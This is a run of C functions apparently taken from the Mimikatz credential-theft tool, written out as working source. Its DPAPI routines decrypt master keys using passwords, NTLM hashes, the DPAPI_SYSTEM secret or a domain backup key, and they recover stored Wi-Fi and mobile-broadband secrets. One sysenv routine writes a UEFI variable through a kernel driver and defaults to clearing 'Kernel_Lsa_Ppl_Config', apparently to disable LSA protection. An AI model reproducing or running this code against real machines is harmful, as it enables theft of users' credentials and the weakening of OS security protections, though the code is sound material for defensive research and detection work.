NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[]) { PBYTE pFile, hex, dataOut; DWORD dwData, lenHex, lenDataOut; LPWSTR dataU, dataF; LPCWSTR infile; PKULL_M_DPAPI_BLOB blob; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &pFile, &dwData)) { if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile)) { if(kull_m_string_quickxml_simplefind(dataU, L"Name", &dataF)) { kprintf(L"Profile \'%s\'\n\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"AccessString", &dataF)) { kprintf(L" * AccessString : %s\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"SubscriberID", &dataF)) { if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex)) { if(blob = kull_m_dpapi_blob_create(hex)) { kprintf(L"\n"); kull_m_dpapi_blob_descr(0, blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL)) { kprintf(L" * SubscriberID : "); kull_m_string_wprintf_hex(dataOut, lenDataOut, 0); kprintf(L"\n"); kprintf(L"%.*s", lenDataOut / sizeof(wchar_t), dataOut); LocalFree(dataOut); } kull_m_dpapi_blob_delete(blob); } LocalFree(hex); } LocalFree(dataF); } LocalFree(dataU); } LocalFree(pFile); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input Wwan XML profile needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[]) { DATA_BLOB dataIn, dataOut, dataEntropy = {0, NULL}; PKULL_M_DPAPI_BLOB blob; PCWSTR description = NULL, szEntropy, outfile; CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt; DWORD flags = 0, outputMode = 1; kull_m_string_args_byName(argc, argv, L"data", (PCWSTR *) &dataIn.pbData, MIMIKATZ); kull_m_string_args_byName(argc, argv, L"description", &description, NULL); if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL)) kull_m_string_stringToHexBuffer(szEntropy, &dataEntropy.pbData, &dataEntropy.cbData); if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL)) flags |= CRYPTPROTECT_LOCAL_MACHINE; pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL; if(kull_m_string_args_byName(argc, argv, L"c", NULL, NULL)) outputMode = 2; kprintf(L"\ndata : %s\n", dataIn.pbData); kprintf(L"description : %s\n", description ? description : L""); kprintf(L"flags : "); kull_m_dpapi_displayProtectionFlags(flags); kprintf(L"\n"); kprintf(L"prompt flags: "); if(pPrompt) kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags); kprintf(L"\n"); kprintf(L"entropy : "); kull_m_string_wprintf_hex(dataEntropy.pbData, dataEntropy.cbData, 0); kprintf(L"\n\n"); dataIn.cbData = (DWORD) ((wcslen((PCWSTR) dataIn.pbData) + 1) * sizeof(wchar_t)); if(CryptProtectData(&dataIn, description, &dataEntropy, NULL, pPrompt, flags, &dataOut)) { if(blob = kull_m_dpapi_blob_create(dataOut.pbData)) { kull_m_dpapi_blob_descr(blob); kull_m_dpapi_blob_delete(blob); } kprintf(L"\n"); if(kull_m_string_args_byName(argc, argv, L"out", &outfile, NULL)) { if(kull_m_file_writeData(outfile, dataOut.pbData, dataOut.cbData)) kprintf(L"Write to file \'%s\' is OK\n", outfile); } else { kprintf(L"Blob:\n"); kull_m_string_wprintf_hex(dataOut.pbData, dataOut.cbData, outputMode | (16 << 16)); kprintf(L"\n"); } LocalFree(dataOut.pbData); } else PRINT_ERROR_AUTO(L"CryptProtectData"); if(dataEntropy.pbData) LocalFree(dataEntropy.pbData); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[]) { NTSTATUS status; LPCWSTR szName, szGuid, szAttributes, szData; UNICODE_STRING uName, uGuid; GUID guid; LPBYTE hex = NULL; DWORD size, attributes, nameLen, structSize; PMIMIDRV_VARIABLE_NAME_AND_VALUE vnv; kull_m_string_args_byName(argc, argv, L"name", &szName, L"Kernel_Lsa_Ppl_Config"); kull_m_string_args_byName(argc, argv, L"guid", &szGuid, L"{77fa9abd-0359-4d32-bd60-28f4e78f784b}"); kull_m_string_args_byName(argc, argv, L"attributes", &szAttributes, L"1"); kull_m_string_args_byName(argc, argv, L"data", &szData, L"00000000"); RtlInitUnicodeString(&uName, szName); RtlInitUnicodeString(&uGuid, szGuid); attributes = wcstoul(szAttributes, NULL, 0); status = RtlGUIDFromString(&uGuid, &guid); if(NT_SUCCESS(status)) { kprintf(L"Name : %wZ\nVendor GUID: ", &uName); kuhl_m_sysenv_display_vendorGuid(&guid); kprintf(L"\nAttributes : %08x (", attributes); kuhl_m_sysenv_display_attributes(attributes); kprintf(L")\n"); if(kull_m_string_stringToHexBuffer(szData, &hex, &size)) { kprintf(L"Length : %u\nData : ", size); kull_m_string_wprintf_hex(hex, size, 1); kprintf(L"\n\n"); nameLen = ((DWORD) wcslen(szName) + 1) * sizeof(wchar_t); structSize = FIELD_OFFSET(MIMIDRV_VARIABLE_NAME_AND_VALUE, Name) + nameLen + size; if(vnv = (PMIMIDRV_VARIABLE_NAME_AND_VALUE) LocalAlloc(LPTR, structSize)) { vnv->Attributes = attributes; RtlCopyMemory(&vnv->VendorGuid, &guid, sizeof(GUID)); vnv->ValueLength = size; vnv->ValueOffset = FIELD_OFFSET(MIMIDRV_VARIABLE_NAME_AND_VALUE, Name) + nameLen; RtlCopyMemory(vnv->Name, szName, nameLen); RtlCopyMemory((PBYTE) vnv + vnv->ValueOffset, hex, size); if(kull_m_kernel_mimidrv_simple_output(IOCTL_MIMIDRV_SYSENVSET, vnv, structSize)) kprintf(L"> OK!\n"); LocalFree(vnv); } LocalFree(hex); } } else PRINT_ERROR(L"RtlGUIDFromString: 0x%08x\n", status); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_sysenv_set(int argc, wchar_t * argv[]) { NTSTATUS status; LPCWSTR szName, szGuid, szAttributes, szData; UNICODE_STRING uName, uGuid; GUID guid; LPBYTE hex; DWORD size, attributes; kull_m_string_args_byName(argc, argv, L"name", &szName, MIMIKATZ); kull_m_string_args_byName(argc, argv, L"guid", &szGuid, L"{b16b00b5-cafe-babe-0ee0-dabadabad000}"); kull_m_string_args_byName(argc, argv, L"attributes", &szAttributes, L"1"); kull_m_string_args_byName(argc, argv, L"data", &szData, L"410020004c00610020005600690065002c002000410020004c00270041006d006f00750072000000"); RtlInitUnicodeString(&uName, szName); RtlInitUnicodeString(&uGuid, szGuid); attributes = wcstoul(szAttributes, NULL, 0); status = RtlGUIDFromString(&uGuid, &guid); if(NT_SUCCESS(status)) { kprintf(L"Name : %wZ\nVendor GUID: ", &uName); kuhl_m_sysenv_display_vendorGuid(&guid); kprintf(L"\nAttributes : %08x (", attributes); kuhl_m_sysenv_display_attributes(attributes); kprintf(L")\n"); if(kull_m_string_stringToHexBuffer(szData, &hex, &size)) { kprintf(L"Length : %u\nData : ", size); kull_m_string_wprintf_hex(hex, size, 1); kprintf(L"\n\n"); status = NtSetSystemEnvironmentValueEx(&uName, &guid, hex, size, attributes); if(NT_SUCCESS(status)) kprintf(L"> OK!\n"); else PRINT_ERROR(L"NtSetSystemEnvironmentValueEx(data): 0x%08x\n", status); LocalFree(hex); } } else PRINT_ERROR(L"RtlGUIDFromString: 0x%08x\n", status); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[]) { PKULL_M_DPAPI_MASTERKEYS masterkeys; PBYTE buffer; PPVK_FILE_HDR pvkBuffer; DWORD szBuffer, szPvkBuffer; LPCWSTR szIn = NULL, szSid = NULL, szPassword = NULL, szHash = NULL, szSystem = NULL, szDomainpvk = NULL; BOOL isProtected = kull_m_string_args_byName(argc, argv, L"protected", NULL, NULL); PWSTR convertedSid = NULL; PSID pSid; PBYTE pHash = NULL, pSystem = NULL; DWORD cbHash = 0, cbSystem = 0; PVOID output; DWORD cbOutput; if(kull_m_string_args_byName(argc, argv, L"in", &szIn, NULL)) { kull_m_string_args_byName(argc, argv, L"sid", &szSid, NULL); kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL); kull_m_string_args_byName(argc, argv, L"hash", &szHash, NULL); kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL); kull_m_string_args_byName(argc, argv, L"domainpvk", &szDomainpvk, NULL); if(kull_m_file_readData(szIn, &buffer, &szBuffer)) { if(masterkeys = kull_m_dpapi_masterkeys_create(buffer)) { //kull_m_dpapi_masterkeys_descr(masterkeys); if(szSid) { if(ConvertStringSidToSid(szSid, &pSid)) { ConvertSidToStringSid(pSid, &convertedSid); LocalFree(pSid); } else PRINT_ERROR_AUTO(L"ConvertStringSidToSid"); } if(szHash) kull_m_string_stringToHexBuffer(szHash, &pHash, &cbHash); if(szSystem) kull_m_string_stringToHexBuffer(szSystem, &pSystem, &cbSystem); if(convertedSid) { if(masterkeys->MasterKey && masterkeys->dwMasterKeyLen) { if(szPassword) { kprintf(L"\n[masterkey] with password: %s (%s user)\n", szPassword, isProtected ? L"protected" : L"normal"); if(kull_m_dpapi_unprotect_masterkey_with_password(masterkeys->dwFlags, masterkeys->MasterKey, szPassword, convertedSid, isProtected, &output, &cbOutput)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL); else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_password\n"); } if(pHash) { kprintf(L"\n[masterkey] with hash: "); kull_m_string_wprintf_hex(pHash, cbHash, 0); if(cbHash == LM_NTLM_HASH_LENGTH) kprintf(L" (ntlm type)\n"); else if(cbHash == SHA_DIGEST_LENGTH) kprintf(L" (sha1 type)\n"); else kprintf(L" (?)\n"); if(kull_m_dpapi_unprotect_masterkey_with_userHash(masterkeys->MasterKey, pHash, cbHash, convertedSid, &output, &cbOutput)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL); else PRINT_ERROR(L"kull_m_dpapi_unprotect_masterkey_with_userHash\n"); } } if(masterkeys->BackupKey && masterkeys->dwBackupKeyLen) { if(!(masterkeys->dwFlags & 1) || (pSystem && cbSystem)) { kprintf(L"\n[backupkey] %s DPAPI_SYSTEM: ", pSystem ? L"with" : L"without"); if(pSystem) kull_m_string_wprintf_hex(pSystem, cbSystem, 0); kprintf(L"\n"); if(kull_m_dpapi_unprotect_backupkey_with_secret(masterkeys->dwFlags, masterkeys->BackupKey, convertedSid, pSystem, cbSystem, &output, &cbOutput)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, NULL); else PRINT_ERROR(L"kull_m_dpapi_unprotect_backupkey_with_secret\n"); } } LocalFree(convertedSid); } if(pHash) LocalFree(pHash); if(pSystem) LocalFree(pSystem); if(szDomainpvk && masterkeys->DomainKey && masterkeys->dwDomainKeyLen) { kprintf(L"\n[domainkey] with RSA private key\n"); if(kull_m_file_readData(szDomainpvk, (PBYTE *) &pvkBuffer, &szPvkBuffer)) { if(kull_m_dpapi_unprotect_domainkey_with_key(masterkeys->DomainKey, (PBYTE) pvkBuffer + sizeof(PVK_FILE_HDR), pvkBuffer->cbPvk, &output, &cbOutput, &pSid)) kuhl_m_dpapi_displayInfosAndFree(output, cbOutput, pSid); else PRINT_ERROR(L"kull_m_dpapi_unprotect_domainkey_with_key\n"); LocalFree(pvkBuffer); } } kull_m_dpapi_masterkeys_delete(masterkeys); } LocalFree(buffer); } } else PRINT_ERROR(L"Input masterkeys file needed (/in:file)\n"); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_unprotect(int argc, wchar_t * argv[]) { DATA_BLOB dataIn, dataOut, dataEntropy = {0, NULL}; PKULL_M_DPAPI_BLOB blob; PCWSTR szEntropy, outfile, infile, szMasterkey, szPassword = NULL; PWSTR description = NULL; CRYPTPROTECT_PROMPTSTRUCT promptStructure = {sizeof(CRYPTPROTECT_PROMPTSTRUCT), CRYPTPROTECT_PROMPT_ON_PROTECT | CRYPTPROTECT_PROMPT_ON_UNPROTECT | CRYPTPROTECT_PROMPT_STRONG, NULL, MIMIKATZ}, *pPrompt; DWORD flags = 0; UNICODE_STRING uString; BOOL statusDecrypt = FALSE; PBYTE masterkey = NULL; DWORD masterkeyLen = 0; if(kull_m_string_args_byName(argc, argv, L"entropy", &szEntropy, NULL)) kull_m_string_stringToHexBuffer(szEntropy, &dataEntropy.pbData, &dataEntropy.cbData); if(kull_m_string_args_byName(argc, argv, L"machine", NULL, NULL)) flags |= CRYPTPROTECT_LOCAL_MACHINE; pPrompt = kull_m_string_args_byName(argc, argv, L"prompt", NULL, NULL) ? &promptStructure : NULL; if(kull_m_string_args_byName(argc, argv, L"masterkey", &szMasterkey, NULL)) kull_m_string_stringToHexBuffer(szMasterkey, &masterkey, &masterkeyLen); kull_m_string_args_byName(argc, argv, L"password", &szPassword, NULL); kprintf(L"\nflags : "); kull_m_dpapi_displayProtectionFlags(flags); kprintf(L"\n"); kprintf(L"prompt flags: "); if(pPrompt) kull_m_dpapi_displayPromptFlags(pPrompt->dwPromptFlags); kprintf(L"\n"); kprintf(L"entropy : "); kull_m_string_wprintf_hex(dataEntropy.pbData, dataEntropy.cbData, 0); kprintf(L"\n"); kprintf(L"masterkey : "); kull_m_string_wprintf_hex(masterkey, masterkeyLen, 0); kprintf(L"\n"); kprintf(L"password : %s\n\n", szPassword ? szPassword : L""); if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &dataIn.pbData, &dataIn.cbData)) { if(blob = kull_m_dpapi_blob_create(dataIn.pbData)) { kull_m_dpapi_blob_descr(blob); if(masterkey && masterkeyLen) statusDecrypt = kull_m_dpapi_unprotect_blob(blob, masterkey, masterkeyLen, dataEntropy.pbData, dataEntropy.cbData, szPassword, (LPVOID *) &dataOut.pbData, &dataOut.cbData); else statusDecrypt = CryptUnprotectData(&dataIn, &description, &dataEntropy, NULL, pPrompt, 0, &dataOut); if(statusDecrypt) { if(description) { kprintf(L"description : %s\n", description); LocalFree(description); } if(kull_m_string_args_byName(argc, argv, L"out", &outfile, NULL)) { if(kull_m_file_writeData(outfile, dataOut.pbData, dataOut.cbData)) kprintf(L"Write to file \'%s\' is OK\n", outfile); } else { uString.Length = uString.MaximumLength = (USHORT) dataOut.cbData; uString.Buffer = (PWSTR) dataOut.pbData; kprintf(L"data - "); if((uString.Length <= USHRT_MAX) && (kull_m_string_suspectUnicodeString(&uString))) kprintf(L"text : %s", dataOut.pbData); else { kprintf(L"hex : "); kull_m_string_wprintf_hex(dataOut.pbData, dataOut.cbData, 1 | (16 << 16)); } kprintf(L"\n"); } LocalFree(dataOut.pbData); } else if(!masterkey) PRINT_ERROR_AUTO(L"CryptUnprotectData"); kull_m_dpapi_blob_delete(blob); } LocalFree(dataIn.pbData); } } if(dataEntropy.pbData) LocalFree(dataEntropy.pbData); if(masterkey) LocalFree(masterkey); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[]) { PBYTE pFile, hex, dataOut; DWORD dwData, lenHex, lenDataOut; LPWSTR dataU, dataSSID, dataF, dataAuth; LPCWSTR infile; PKULL_M_DPAPI_BLOB blob; if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL)) { if(kull_m_file_readData(infile, &pFile, &dwData)) { if(dataU = kull_m_string_qad_ansi_to_unicode((const char *) pFile)) { if(kull_m_string_quickxml_simplefind(dataU, L"name", &dataF)) { kprintf(L"Profile \'%s\'\n\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"SSID", &dataSSID)) { kprintf(L" * SSID "); if(kull_m_string_quickxml_simplefind(dataSSID, L"name", &dataF)) { kprintf(L"name : %s\n", dataF); LocalFree(dataF); } else if(kull_m_string_quickxml_simplefind(dataSSID, L"hex", &dataF)) { kprintf(L"hex : %s\n", dataF); LocalFree(dataF); } else kprintf(L"?\n"); LocalFree(dataSSID); } if(kull_m_string_quickxml_simplefind(dataU, L"authentication", &dataAuth)) { kprintf(L" * Authentication: %s\n", dataAuth); if(kull_m_string_quickxml_simplefind(dataU, L"encryption", &dataF)) { kprintf(L" * Encryption : %s\n", dataF); LocalFree(dataF); } if(kull_m_string_quickxml_simplefind(dataU, L"keyMaterial", &dataF)) { if(kull_m_string_stringToHexBuffer(dataF, &hex, &lenHex)) { if(blob = kull_m_dpapi_blob_create(hex)) { kprintf(L"\n"); kull_m_dpapi_blob_descr(0, blob); if(kuhl_m_dpapi_unprotect_raw_or_blob(hex, lenHex, NULL, argc, argv, NULL, 0, (LPVOID *) &dataOut, &lenDataOut, NULL)) { kprintf(L" * Key Material : "); if(_wcsicmp(dataAuth, L"WEP") == 0) { kprintf(L"(hex) "); kull_m_string_wprintf_hex(dataOut, lenDataOut, 0); } else kprintf(L"%.*S", lenDataOut, dataOut); kprintf(L"\n"); LocalFree(dataOut); } kull_m_dpapi_blob_delete(blob); } LocalFree(hex); } LocalFree(dataF); } LocalFree(dataAuth); } LocalFree(dataU); } LocalFree(pFile); } else PRINT_ERROR_AUTO(L"kull_m_file_readData"); } else PRINT_ERROR(L"Input Wlan XML profile needed (/in:file)\n"); return STATUS_SUCCESS; }